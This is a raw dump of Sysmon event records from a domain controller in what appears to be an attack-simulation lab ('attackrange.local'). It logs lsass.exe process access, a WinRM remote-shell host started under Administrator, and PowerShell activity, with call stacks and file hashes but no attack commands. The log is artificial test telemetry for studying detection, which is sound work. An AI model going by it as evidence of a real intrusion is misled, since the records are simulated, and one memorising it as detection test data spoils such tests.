12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.644{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.627{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.627{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.627{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F5C3D22B2A17FE5A066C855A0FB575CF,SHA256=FBF2107F9B504AA9AED40D099A2E40E4F69142CF5666EA6585CF0F434D72D16B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.518{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.518{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.518{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.471{266CAFBE-6497-6064-8500-00000000AE01}712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.299{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.299{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:27.283{266CAFBE-6497-6064-8500-00000000AE01}712\PSHost.132616656871715378.712.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.268{266CAFBE-6497-6064-8500-00000000AE01}712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_it0jbgxr.xkh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.268{266CAFBE-6497-6064-8500-00000000AE01}712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rfopcqcl.12k.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.221{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rfopcqcl.12k.ps12021-03-31 12:01:27.221 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.205{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-6497-6064-8300-00000000AE01}44724460C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 